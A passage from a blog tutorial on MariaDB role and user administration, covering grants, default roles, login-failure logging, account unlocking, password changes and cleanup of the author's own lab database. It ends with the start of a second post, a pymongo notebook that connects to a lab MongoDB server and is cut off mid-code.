<span style="color: white;">+-----------------------+-----------+-------------------------------------------+--------------+-----------------+----------------------+---------+</span>
<span style="color: white;">| User | Host | Password | default_role | max_connections | max_user_connections | is_role |</span>
<span style="color: white;">+-----------------------+-----------+-------------------------------------------+--------------+-----------------+----------------------+---------+</span>
<span style="color: white;">| mariadb.sys | localhost | | | 0 | 0 | N |</span>
<span style="color: white;">| root | localhost | invalid | | 0 | 0 | N |</span>
<span style="color: white;">| mysql | localhost | invalid | | 0 | 0 | N |</span>
<span style="color: white;">| securitynik_db_users | | | | 0 | 0 | Y |</span>
<span style="color: white;">| securitynik_db_admins | | | | 0 | 0 | Y |</span>
<span style="color: white;">| admin | % | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 | | 0 | 0 | N |</span>
<span style="color: white;">| securitynik | % | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 | | 0 | 0 | N |</span>
<span style="color: white;">| nakia | localhost | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 | | 0 | 0 | N |</span>
<span style="color: white;">| neysa@localhost | % | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 | | 0 | 0 | N |</span>
<span style="color: white;">+-----------------------+-----------+-------------------------------------------+--------------+-----------------+----------------------+---------+</span>
<span style="color: white;">9 rows in set (0.001 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Add users to the <i>securitynik_db_users </i>role ...</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> GRANT securitynik_db_users TO 'securitynik','nakia'@'localhost','neysa@localhost';</span>
<span style="color: white;">Query OK, 0 rows affected (0.010 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>... and to the <i>securitynik_db_admin</i> role</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> GRANT securitynik_db_admins TO 'admin';</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR 'securitynik_db_users';</span>
<span style="color: white;">+--------------------------------------------------------------+</span>
<span style="color: white;">| Grants for securitynik_db_users |</span>
<span style="color: white;">+--------------------------------------------------------------+</span>
<span style="color: white;">| GRANT USAGE ON *.* TO `securitynik_db_users` |</span>
<span style="color: white;">| GRANT SELECT ON `securitynik_db`.* TO `securitynik_db_users` |</span>
<span style="color: white;">+--------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR 'securitynik_db_admins';</span>
<span style="color: white;">+-----------------------------------------------------------------------+</span>
<span style="color: white;">| Grants for securitynik_db_admins |</span>
<span style="color: white;">+-----------------------------------------------------------------------+</span>
<span style="color: white;">| GRANT USAGE ON *.* TO `securitynik_db_admins` |</span>
<span style="color: white;">| GRANT ALL PRIVILEGES ON `securitynik_db`.* TO `securitynik_db_admins` |</span>
<span style="color: white;">+-----------------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span>
</pre></div>
<p></p><p>Set the default role for user <i>securitynik</i></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SET DEFAULT ROLE securitynik_db_users FOR securitynik;</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Ok with that in place. Time to get user <i>securitynik </i>to login.</p><p>Before logging in, I made the following configuration changes to track the logs for MariaDB.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo vi /etc/mysql/mariadb.cnf </span>
<span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo cat /etc/mysql/mariadb.cnf | grep --perl-regexp '\[mariadb\]' --after-context=1 </span>
<span style="color: white;">[mariadb]</span>
<span style="color: white;">log_error=/var/log/mysql/mariadb.err</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With this in place, the file <i>mariadb.err</i> is now created under <i>/var/log/mysql/mariadb.err</i></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo ls /var/log/mysql/mariadb.err </span>
<span style="color: white;">/var/log/mysql/mariadb.err</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Finally try to login a few times ....</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ mysql --user=securitynik --password='Testing2' --verbose</span>
</pre></div>
</div><div><br /></div><div><div>Which resulted in:</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">2022-10-25 16:26:47 31 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:50 32 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:52 33 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:52 34 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:53 35 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:54 36 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:54 37 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:56 38 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:57 39 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>The above is expected as the password is incorrect. Trying again with the correct password.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ mysql --user=securitynik --password='Testing1' --verbose</span>
<span style="color: white;">ERROR 4151 (HY000): Access denied, this account is locked</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>This is expected. When this account was created it was created <i>ACCOUNT LOCK</i></p><p>Let's now alter that account so it can authenticate.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> ALTER USER 'securitynik' ACCOUNT UNLOCK;</span>
<span style="color: white;">Query OK, 0 rows affected (0.001 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With the above change, we now have successful authentication.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ mysql --user=securitynik --password='Testing1' --verbose</span>
<span style="color: white;">Welcome to the MariaDB monitor. Commands end with ; or \g.</span>
<span style="color: white;">Your MariaDB connection id is 43</span>
<span style="color: white;">Server version: 10.6.8-MariaDB-1 Debian buildd-unstable</span>
<span style="color: white;">Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.</span>
<span style="color: white;">Reading history-file /home/kali/.mysql_history</span>
<span style="color: white;">Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.</span>
<span style="color: white;">MariaDB [(none)]> </span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Confirm the <i>securitynik</i> default role.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [(none)]> SELECT CURRENT_ROLE();</span>
<span style="color: white;">--------------</span>
<span style="color: white;">SELECT CURRENT_ROLE()</span>
<span style="color: white;">--------------</span>
<span style="color: white;">+----------------------+</span>
<span style="color: white;">| CURRENT_ROLE() |</span>
<span style="color: white;">+----------------------+</span>
<span style="color: white;">| securitynik_db_users |</span>
<span style="color: white;">+----------------------+</span>
<span style="color: white;">1 row in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With this in place let's set a new password for the securitynik user.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SET PASSWORD FOR 'securitynik' = PASSWORD('WelcomeWagon');</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span>
</pre></div>
</div><div><br /></div><div>Confirm the user can login with the new password. First try the old password.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ mysql --user=securitynik --password='Testing1' --verbose</span>
<span style="color: white;">ERROR 1045 (28000): Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
</pre></div>
</div><div><br /></div><div>Failed as expected. Trying new password ...</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ mysql --user=securitynik --password='WelcomeWagon' --verbose</span>
<span style="color: white;">MariaDB [(none)]> </span>
</pre></div>
</div><div><br /></div><div>With this in place, let's tidy up. </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT user,host,password,default_role FROM mysql.user;</span>
<span style="color: white;">+-----------------------+-----------+-------------------------------------------+----------------------+</span>
<span style="color: white;">| User | Host | Password | default_role |</span>
<span style="color: white;">+-----------------------+-----------+-------------------------------------------+----------------------+</span>
<span style="color: white;">| mariadb.sys | localhost | | |</span>
<span style="color: white;">| root | localhost | invalid | |</span>
<span style="color: white;">| mysql | localhost | invalid | |</span>
<span style="color: white;">| securitynik_db_users | | | |</span>
<span style="color: white;">| securitynik_db_admins | | | |</span>
<span style="color: white;">| admin | % | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 | |</span>
<span style="color: white;">| securitynik | % | *1D1F0D40B7E2B350296DAF7183062FBA4C8B81C9 | securitynik_db_users |</span>
<span style="color: white;">| nakia | localhost | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 | |</span>
<span style="color: white;">| neysa@localhost | % | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 | |</span>
<span style="color: white;">+-----------------------+-----------+-------------------------------------------+----------------------+</span>
<span style="color: white;">9 rows in set (0.001 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Removing user <i>securitynik </i>from the default role <i>securitynik_db_users</i>;</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SET DEFAULT ROLE NONE FOR securitynik;</span>
<span style="color: white;">Query OK, 0 rows affected (0.001 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> SELECT user,host,password,default_role FROM mysql.user WHERE user='securitynik';</span>
<span style="color: white;">+-------------+------+-------------------------------------------+--------------+</span>
<span style="color: white;">| User | Host | Password | default_role |</span>
<span style="color: white;">+-------------+------+-------------------------------------------+--------------+</span>
<span style="color: white;">| securitynik | % | *1D1F0D40B7E2B350296DAF7183062FBA4C8B81C9 | |</span>
<span style="color: white;">+-------------+------+-------------------------------------------+--------------+</span>
<span style="color: white;">1 row in set (0.001 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With the default roles removed from <i>securitynik</i>, <i>DROP</i> the roles. Verify the roles still exists and remove any permission previously issued to <i>securitynik_db_users </i>and <i>securitynik_db_admins </i>by removing these roles.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT user,is_role FROM mysql.user WHERE user='securitynik_db_users' or user='securitynik_db_admins';</span>
<span style="color: white;">+-----------------------+---------+</span>
<span style="color: white;">| User | is_role |</span>
<span style="color: white;">+-----------------------+---------+</span>
<span style="color: white;">| securitynik_db_users | Y |</span>
<span style="color: white;">| securitynik_db_admins | Y |</span>
<span style="color: white;">+-----------------------+---------+</span>
<span style="color: white;">2 rows in set (0.001 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Drop the roles and verify they no longer exists</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> DROP ROLE securitynik_db_users,securitynik_db_admins;</span>
<span style="color: white;">Query OK, 0 rows affected (0.011 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> SELECT user,is_role FROM mysql.user WHERE user='securitynik_db_users' or user='securitynik_db_admins';</span>
<span style="color: white;">Empty set (0.001 sec)</span>
</pre></div>
</div><div><br /></div><div>This also removed the grants assigned to those roles as is expected.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS;</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| Grants for root@localhost |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` IDENTIFIED VIA mysql_native_password USING 'invalid' OR unix_socket WITH GRANT OPTION |</span>
<span style="color: white;">| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span>
</pre></div>
</div><div><br /></div><div><div>Review the data in the <i>interesting_data </i>table</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT * FROM interesting_data;</span>
<span style="color: white;">+---------+-----------------------------+--------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">| file_no | owner | password | admin | comments | blogs | delete_me |</span>
<span style="color: white;">+---------+-----------------------------+--------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">| 1 | securitynik | Testing1 | Y | Systems Administrator | https://www.securitynik.com | you are to be deleted |</span>
<span style="color: white;">| 2 | booo | Testing1 | Y | Guest User | https://www.example.local | NULL |</span>
<span style="color: white;">| 3 | owner_updated_YouKnowWhoIAm | You changed me :-( | Y | some user | https://www.blah.local | NULL |</span>
<span style="color: white;">| 4 | hello | world | Y | hi | securitynik.local | NULL |</span>
<span style="color: white;">+---------+-----------------------------+--------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">4 rows in set (0.000 sec)</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>Drop a few rows from the interesting_data table</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> DELETE FROM interesting_data WHERE file_no=1 or file_no=2 or file_no=3;</span>
</pre></div>
</div><div><br /></div><div>Verify the records no longer exists.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">Query OK, 3 rows affected (0.010 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> SELECT * FROM interesting_data;</span>
<span style="color: white;">+---------+-------+----------+-------+----------+-------------------+-----------+</span>
<span style="color: white;">| file_no | owner | password | admin | comments | blogs | delete_me |</span>
<span style="color: white;">+---------+-------+----------+-------+----------+-------------------+-----------+</span>
<span style="color: white;">| 4 | hello | world | Y | hi | securitynik.local | NULL |</span>
<span style="color: white;">+---------+-------+----------+-------+----------+-------------------+-----------+</span>
<span style="color: white;">1 row in set (0.002 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Realistically, I could have just dropped the table</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> DROP TABLE interesting_data;</span>
<span style="color: white;">Query OK, 0 rows affected (0.022 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> SHOW TABLES;</span>
<span style="color: white;">Empty set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><div><div>Time to drop the database and close up shop.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW DATABASES;</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| Database |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| information_schema |</span>
<span style="color: white;">| mysql |</span>
<span style="color: white;">| performance_schema |</span>
<span style="color: white;">| securitynik_db |</span>
<span style="color: white;">| sys |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">5 rows in set (0.000 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> DROP DATABASE securitynik_db;</span>
<span style="color: white;">Query OK, 0 rows affected (0.013 sec)</span>
<span style="color: white;">MariaDB [(none)]> SHOW DATABASES;</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| Database |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| information_schema |</span>
<span style="color: white;">| mysql |</span>
<span style="color: white;">| performance_schema |</span>
<span style="color: white;">| sys |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">4 rows in set (0.000 sec)</span>
</pre></div>
</div><p>That's it!</p><p>References:</p><p><a href="https://dev.mysql.com/doc/refman/8.0/en/" target="_blank">https://dev.mysql.com/doc/refman/8.0/en/<br /></a><a href="https://www.mysqltutorial.org/" target="_blank">https://www.mysqltutorial.org/<br /></a><a href="https://www.w3schools.com/mysql/mysql_create_table.asp" target="_blank">https://www.w3schools.com/mysql/mysql_create_table.asp<br /></a><a href="https://www.mysqltutorial.org/mysql-show-columns/" target="_blank">https://www.mysqltutorial.org/mysql-show-columns/<br /></a><a href="https://www.rosehosting.com/blog/mysql-show-users/" target="_blank">https://www.rosehosting.com/blog/mysql-show-users/<br /></a><a href="https://www.softwaretestinghelp.com/mysql-create-user/" target="_blank">https://www.softwaretestinghelp.com/mysql-create-user/<br /></a><a href="https://mariadb.com/kb/en/create-user/" target="_blank">https://mariadb.com/kb/en/create-user/<br /></a><a href="https://mariadb.com/kb/en/error-log/" target="_blank">https://mariadb.com/kb/en/error-log/<br /></a><a href="https://mariadb.com/kb/en/mysqluser-table/" target="_blank">https://mariadb.com/kb/en/mysqluser-table/</a></p><p><br /></p></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-30536453486754623802022-04-28T19:44:00.001-07:002022-04-28T19:45:18.219-07:00Beginning MongoDB - MongoClientTo see the <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20MongoDb.ipynb" target="_blank">full notebook</a>, check out my GitHub site.<div><br /></div><div> <!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Import the needed libraries</span>
<span style="color: #fb660a; font-weight: bold;">import</span> <span style="color: white;">requests</span>
<span style="color: #fb660a; font-weight: bold;">from</span> <span style="color: white;">pymongo</span> <span style="color: #fb660a; font-weight: bold;">import</span> <span style="color: white;">MongoClient</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Setup the connection to the mongodb server</span>
<span style="color: white;">mongodb_client</span> <span style="color: white;">=</span> <span style="color: white;">MongoClient(</span><span style="color: #0086d2;">'10.0.0.120'</span><span style="color: white;">,</span> <span style="color: #0086f7; font-weight: bold;">27017</span><span style="color: white;">)</span>
<span style="color: white;">mongodb_client</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Ping </span>
<span style="color: white;">mongodb_client.admin.command(</span><span style="color: #0086d2;">'ping'</span><span style="color: white;">)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># List the databases on the server</span>
<span style="color: white;">mongodb_client.list_database_names()</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># List all collections in the securitynik database</span>
<span style="color: white;">securitynik_db</span> <span style="color: white;">=</span> <span style="color: white;">mongodb_client[</span><span style="color: #0086d2;">'securitynik-mongo-db'</span><span style="color: white;">]</span>
<span style="color: white;">securitynik_db.list_collection_names()</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Get the db host information</span>
<span style="color: white;">securitynik_db.HOST</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Get the column names for the employees collections</span>
<span style="color: white;">securitynik_db.employees.find_one().keys()</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Create a collection wnamed employees within the employee_db</span>
<span style="color: white;">employees</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.employees</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Create a collection named user</span>
<span style="color: white;">users</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.users</span>
<span style="color: white;">securitynik_db,</span> <span style="color: white;">employees,</span> <span style="color: white;">users</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="color: white;">employee</span> <span style="color: white;">=</span> <span style="color: white;">{</span>
<span style="color: #0086d2;">'fname'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'Nik'</span><span style="color: white;">,</span>
<span style="color: #0086d2;">'lname'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'Alleyne'</span><span style="color: white;">,</span>
<span style="color: #0086d2;">'Active'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'True'</span><span style="color: white;">,</span>
<span style="color: #0086d2;">'profession'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'Blogger'</span>
<span style="color: white;">}</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Add a record to the employees_db</span>
<span style="color: white;">employees.insert_one(employee)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Read the employee collection and print the first record</span>
<span style="color: white;">employees.find_one()</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="color: white;">insert_many</span> <span style="color: white;">=</span> <span style="color: white;">[</span>
